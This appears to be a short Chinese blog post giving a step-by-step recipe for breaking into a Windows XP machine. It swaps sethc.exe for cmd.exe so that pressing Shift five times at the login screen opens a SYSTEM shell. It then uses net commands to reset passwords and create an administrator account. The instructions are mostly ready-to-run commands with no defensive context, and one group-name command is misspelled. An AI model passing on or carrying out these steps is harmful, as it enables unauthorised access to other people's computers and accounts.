1.开机启动DOS,进入XP系统所在磁盘;
2.输入:
cd windows
cd system32
copy sethc.exe sethc1.exe
copy cmd.exe sethc.exe
重起进入系统;
3.在自动登陆之前按5次shift或者按住shift约8秒会出现cmdshell;
4.键入命令:net user xxyyzas123 123456 /add”这是更改该用户密码的命令,命令中的“123456”是更改后的新密码,如果键入的用户不存在(xxyyzas123),那么系统会自动添加这个用户。
5.另外还可以使用“net localgroup administrator xxyyzas123 /add”命令把xxyyzas123这个用户升为超级用户,即可拥有所有权限(这时可以输入mmc,直接调用控制台修改口令,此时的cmdshell为 System权限.可以输入:explorer.exe登入桌面,在菜单中可看到帐户为System);
6.最后一步,在登录窗口中输入刚刚更改的新密码便可成功登陆;
7.将sethc.exe还原.
阅读(895) | 评论(0) | 转发(0) |